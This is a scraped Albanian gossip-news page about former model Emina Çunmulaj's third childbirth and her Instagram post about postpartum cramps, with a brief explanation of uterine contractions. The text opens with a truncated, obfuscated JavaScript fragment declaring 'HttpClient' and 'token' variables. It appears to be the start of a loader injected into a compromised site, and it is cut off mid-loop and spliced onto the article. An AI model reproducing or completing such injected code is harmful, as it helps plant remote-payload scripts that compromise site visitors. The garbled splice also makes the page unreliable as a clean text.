;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Emina thekson një shqetësim të paslindjes që shumë pak diskutohet

By

Një ditë më parë, Emina Çunmulaj u bë nënë për herë të tretë.

Ajo solli në jetë një djalë që i lanë emrin Shá Yosef Nazarian. Lajmin e bëri të ditur ajo vetë me anë të një postimi në llogarinë e saj në Instagram.

Ndonëse ajo dhe djali gëzojnë shëndet të plotë, ish-modelja theksoi një shqetësim për nënat në periudhën e paslindjes.

“Duhet të flasim më shumë për ngërçet dhe kontraksionet e paslindjes. Si paskam harruar se si janë!! Më duket që po kaloj dhimbjet e lindjes sërish”, shkroi ajo në një postim duke bërë hastag #momlife.

Në fakt, në periudhën pas lindjes, është e zakonshme të përjetoni kontraktime – është mënyra se si mitra zvogëlohet në madhësi. Këto kontraktime ndihen si ngërçe të shkurtra dhe të mprehta në bark – si dhimbje menstruale ose kontraktime të lindjes. Zakonisht ulen në intensitet çdo ditë pas lindjes. /prive.al

No description available.

Artikuj të ngjashëm